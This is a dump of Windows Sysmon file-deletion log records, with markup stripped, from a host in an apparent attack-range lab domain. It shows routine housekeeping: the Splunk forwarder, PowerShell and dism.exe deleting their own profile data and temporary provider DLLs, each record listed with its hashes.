23542300x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.402{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=94AF41A42A6C8735FE0054B749CF2B6A,SHA256=4C805619C163C2B26C14BF10FC66FCEF400CD59DEA55C2E86BB12FCF1C5315D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.371{266CAFBE-6435-6064-B802-00000000AD01}3020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.340{266CAFBE-6435-6064-B902-00000000AD01}4732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.528{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\WimProvider.dllMD5=1B0C7DFB2240BA004B37904073624DB3,SHA256=F2C7DB522DDE968EDF49B03BC10978AAC4C42C745CA4A474627E8CEBBCEBB00A,IMPHASH=20D31D66F56B810094B1AA564C92009Dtruetrue 
23542300x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.512{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\VhdProvider.dllMD5=F37C8F5BF852151D9BF085687A8DEC6D,SHA256=6CDFC95C2F2ED3695D5EE8CF4367A6C7FB5707DA3C234CEE8FA8C1BBDE426DE7,IMPHASH=3CA997A1A0BD38B850B18DAED5E948DEtruetrue 23542300x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.512{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\UnattendProvider.dllMD5=3DB4777B76FC1973A61754FAEC348981,SHA256=29A4C7379E5A0A7532C90B5ACE0DD99AB5311D03CC0BA6A4BCFB410D7D8B01AE,IMPHASH=4FA75E8720452554D61C8AC5FD64C43Ftruetrue 23542300x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.512{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\TransmogProvider.dllMD5=5E82E2B7CFF045C7CDA8E33EAB186402,SHA256=0038B82E999C3DEF3980D39A8CAED9EA6B52A4FC9EF58BF3B3F5FC91F7748112,IMPHASH=7746C0E3C7D3763C5F13C90D4934087Btruetrue 23542300x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.496{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\SmiProvider.dllMD5=C5C7A9E3121B91E51ECFBA6FB2985044,SHA256=FB519B9EEF4C3344D58C768BD3AD7ADCB0677EA7B998056B6A13620CB9E61412,IMPHASH=03C38376DA7CCE75E82EECACADA0EA03truetrue 23542300x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.496{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\ProvProvider.dllMD5=5077063311C5708318C5FA3E255011ED,SHA256=97FA95102B6ACF00C70F140EE9FA4A73A6BE7C03E0F0D99AE58DB5E492CD0ECA,IMPHASH=D8DD764BFC0F1D9E403714D169018B83truetrue 23542300x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.496{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\OSProvider.dllMD5=4868187A2F176074DB7F35E356F74D4F,SHA256=84C8C4C67C808871A278254304D985533F67D44391840F43674FC829014E1B60,IMPHASH=82A4D833A82D441391A9AA3027199337truetrue 23542300x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\OfflineSetupProvider.dllMD5=86B7E8438B1125C479FD275B1BDDB9A7,SHA256=47FAF8671B25A30D7BCC47AD35926D70DB633A181FA6C276479B4408A526E63E,IMPHASH=B8B4A188EFC4F12D33591C6D319B6F12truetrue 23542300x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\MsiProvider.dllMD5=EA19239A85416A488360FA564D312402,SHA256=F21591336CD1A24EE941827620405FA34414C1C349216B4B8083ECD1FFF17C29,IMPHASH=33E1132923056DDEFB0521726DA5B987truetrue 23542300x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\LogProvider.dllMD5=F7DB4F104DBB56DF5A156E7329E80112,SHA256=7C67EFAF44D1413576B4575B1A4C975BCB10B64BEF13E6756E895D4DB9E61AA2,IMPHASH=FB695172E8A76C56E97CE435F8ED0220truetrue 23542300x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\IntlProvider.dllMD5=0082903881275179642AE83EFA720310,SHA256=7CCF1625E6FBE4DB16F12AC037E4236A3EF269DEE47A157C68374C867941F9E8,IMPHASH=CFB81BC5FF922F23D605A653700FE666truetrue 23542300x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\ImagingProvider.dllMD5=EEB4AA36BAD26A2C6216A1FF3439B58C,SHA256=44A6679425039DC870C297294C4B3323F6FA9DE5C7D16D7D0AB7E1254AFC75D3,IMPHASH=0264D9B4BFE54732ADF0E29BC73BF280truetrue 23542300x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\IBSProvider.dllMD5=11DE34FCDB75E79A920D3B491F3E7BF0,SHA256=6B7C7AD8B1AD522B27B2CC5E4F76F56ADE4495D7D46CE4F997A68954F072AF17,IMPHASH=C755896FA14213058E34639A28868FBCtruetrue 23542300x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\GenericProvider.dllMD5=397ED660129D40927A27B75A4B8FAE2E,SHA256=EAFCECFE911DABB4531E1331DDF2E119DCBB6B7A887D70BDE737EA76BE10EB74,IMPHASH=F55EE75573C110804DE5E50ACEEC1B06truetrue 23542300x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\FolderProvider.dllMD5=6428B4D0C26DB23E9478F039891CD5C9,SHA256=55126BB099785C2F9CD32A30991082C47D62C8231D570A9D8A6F3CC599B25EE1,IMPHASH=B2CC5EDD42A866F7CB6CAE42DB969187truetrue 23542300x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\FfuProvider.dllMD5=E27BC7F808E72F08372BA3C40B4B6344,SHA256=927B194432046C0D2ADF7C7B71E4BE85602C4D00A5D6EDA9F9DB9924E1C3447A,IMPHASH=8580AF5C1871319D05329DB2E96A8146truetrue 23542300x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\WimProvider.dll.muiMD5=CC3B15540DDB521A300BAFF0BF4F902E,SHA256=33C06CC037DF1EBB72A15BCC2E09BC89DFEF7DD94441C650FD3D0C833122002A,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\VhdProvider.dll.muiMD5=10536C56F02E68EBD13D0B2CE8665C6A,SHA256=06C3B71D251A8DD47D02EDBFBE84E0B6B1D67956DE4D3996031434CBAD728929,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\UnattendProvider.dll.muiMD5=B7E3676672BE6851EA13ADD879C2945E,SHA256=2D2D82EE842CD346B58DCAFAE6FEC46D491E0D15CFBE0D8964A4AB7F18C5AAB9,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\TransmogProvider.dll.muiMD5=D5D596B1102DA565C2ED1FAAC170E758,SHA256=B5DBB36E947FD64AAF22C53F0A9634C7D72D4CC270C055B67E020920BF806909,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\SmiProvider.dll.muiMD5=CAD746ED5AF63E7FC49ED4A5A3984629,SHA256=016C6071B04E6D7E12AD9B8A85C002320331E01ED62922C573A1AC43BA0DD919,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\ProvProvider.dll.muiMD5=70AFEC86B6CF677BF8D3C713CA3281FB,SHA256=C8579EC95A51EB663FFC6145F0998C2F1930A6B8146C84C0A9094BCA4E5195A7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\OSProvider.dll.muiMD5=A464DFEDEA8520616AA9B2ACD166A77F,SHA256=54E985CFF256CEBE82E9EF3E814A5FDA9FF730BCB50265E9BA78DE65A4DE3F42,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\OfflineSetupProvider.dll.muiMD5=CED788DBD9D13D0490B2F642B0B051F6,SHA256=D5DBC0A52B598800EE14569859383525950B865F4816E47E2E73F79AA1C32A09,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\MsiProvider.dll.muiMD5=5AE9ABD6BB469F3AD7B3A4CCD40974BF,SHA256=C2CE66F2F218890AA76F8BAB68B4C0FDCED0688E694F912F3A5BFABFA6CDB5E7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\LogProvider.dll.muiMD5=0D4519BC8EB58A006E4A5EB993C0DCCF,SHA256=DAFFE67521F9B4657FBFEF9585234CB39293F9B866C0D97D66F675037515BB51,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\IntlProvider.dll.muiMD5=16ACB74928BC55FD4AAC316F3B92E1D7,SHA256=17CB486CADB679C75A27BA6C76E2FE714F4B8DA845E6F795759517D6734F0BC9,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\ImagingProvider.dll.muiMD5=26F5BBF8D6EE90B4F47C18E93D1087FB,SHA256=F41738FEF7140176447ECF371B1117A485E48BA6F3E9AFAA8C4F883ABFAE62DA,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\IBSProvider.dll.muiMD5=0B09FE334215A8E736B2CF08A50D5204,SHA256=DCE9AD3B79F91BEBEDDFCD9E03F1557CB7C6114AC906081E9E046F807093CDF1,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\GenericProvider.dll.muiMD5=956B8B45B92321C0D5975EE9A6C5B773,SHA256=578541D71466CF61EF399023B34EDFCBD915142BE856534AD4D17D25E7CC9F3D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\FolderProvider.dll.muiMD5=DC4E4C2800DC6D98F7893044A21D246B,SHA256=8B4CE62F4E4294E701193C7AE393EB5EB29AA45932D376CB1A03728A140096AE,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\FfuProvider.dll.muiMD5=5ECAD70AC2B3A95CBB42D6FE67D2F726,SHA256=C210389DBB9B7B4A802E4B0C3C708B6F55B086564A01E19CFB183B6AF916C30A,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\DmiProvider.dll.muiMD5=38C2A1560C340537C3AE0CE04BDF7EAA,SHA256=52B06DFD85FB5AB1DCE2BE665CA144B1AE6658F518D1623D9B44C347C482B064,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\DismProv.dll.muiMD5=BD7B77B3EE9A12FF3F5446ECDF80B5C6,SHA256=B972A0B2C4682E9074441B481BD886DE19B8DB3DBA401B88E980B154C14D5A7E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\DismCore.dll.muiMD5=C901FF639EDFBBE710D6E5882F07CD24,SHA256=9BDA61D23DC50F9AFA82DA94B06B7B9C8229D5ED666D2F5270DAE13100815C27,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\CompatProvider.dll.muiMD5=A2A344CB32B6835744A36D877C952665,SHA256=A74D765B796638A921C4810D1712A08F7A37C9BA9E91F4DFDCB9727611C3D18D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\CbsProvider.dll.muiMD5=179B34BE97A383AF3E757031E7DA964B,SHA256=ABD3824664D1336EE849D89BA178606CC1B1E23E173752D8093F34A5580FA8F4,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\AssocProvider.dll.muiMD5=386FE7AC95738A0CB6D25DEA662991F1,SHA256=22DC7317108A528BA92C853330598F628B93FFF27CAC34C2F501B806A75261D9,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\AppxProvider.dll.muiMD5=9FF5081115C2C21D9F85AF7EE6D2CC63,SHA256=107B10A8C1426F1C0D703F06832D740A4CFDCAA596FA0EA147A32A736A7A2A4D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DmiProvider.dllMD5=FC76385FF00D4A93618D842B41716D8D,SHA256=BBD49A49CFFA8411FFA91B02541F5F3B5333FD9055BC129DDD3B36EB005C34D9,IMPHASH=062B279D8ED4374A0CD0C84620F4BE4Etruetrue 23542300x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DismProv.dllMD5=8C7D97E22045AE402EA896F514CEED81,SHA256=76D3202E11BA22D277532A14CAE60E596975C0D8C34C7BE154F453EB1F7C37EF,IMPHASH=0247CB1C8FD55E43A448E359883057DBtruetrue 23542300x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DismHost.exeMD5=A59C22B77871CC18970038B7FA43826F,SHA256=CB84B51713BAD689ABB96560E57A71B276D4B28B1C09C7116EE85F5782A1B144,IMPHASH=734010D3430DBD2CA51B599924FE1424truetrue 23542300x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.434{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DismCorePS.dllMD5=FB88731B484D1FF4AFF5DB75A20799FA,SHA256=EA155388211E0C3CEF2C99BD5F341C9F93F1ECDA6F21096DB6F9DB2110686A52,IMPHASH=65E10DCEA11F7117C161DC7557B87689truetrue 23542300x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.434{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DismCore.dllMD5=F1AB58CACD95921A04225222D03CDEA0,SHA256=EDE89F377FD46F95639413411CDA072D9FF63E72A399B26AB4870094F145091B,IMPHASH=B7B56C790C8AB7134B0680D8DFE46658truetrue 23542300x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.434{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\CompatProvider.dllMD5=E5C1D020198EBEC1D5ABA640C9A600D0,SHA256=A80FD2846E05AB491BDAAFCE8854A04549A852066B82B90D757D9B6A44ADA8C8,IMPHASH=2CDD615C09EED7B572606B2A0C0EFD2Ftruetrue 23542300x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.434{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\CbsProvider.dllMD5=D4A64C7C50D0C6BE9F8770177E2264BF,SHA256=E6505F9DBE17DF9E7E52B5FE1720E1F6482B25D262A47A320CF438C5FD5A5797,IMPHASH=99D5DC4FF67AB12670853DD4E32E8358truetrue 
23542300x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\AssocProvider.dllMD5=56CB83B3454882509791FBA62832BC87,SHA256=5B01524CC03B6EB58CC9E0FF479014EAF89EE7FDE2791BFF871BC90274D200AC,IMPHASH=83F73507B4613B09C6FA825535D8A81Etruetrue 23542300x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\AppxProvider.dllMD5=8F6792DF9EC54934B76A68B1D7B66ECA,SHA256=E57CB2D5CEC5E1354F4E31CD08ADA02FCAA0E2DEA4B28C8F61683BFA3E875C05,IMPHASH=F1558CACACA712554EBD5926B4B3FE52truetrue 23542300x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-winsvc-l1-1-0.dllMD5=09934F0F7227B9489D117C26EC20CD14,SHA256=CBE408A0AFF90986A6A7DDF022F96302B4FADD08A0C3C166CAC7A64D6ABF041D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-private-l1-1-1.dllMD5=484ED248F1A72C6E4E6F6C3F5A3339ED,SHA256=00E14515FE6FEBBF3C2CFC89A6F1A3D6F48B3E7A5EB08D50DADF69CE3F34CC47,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
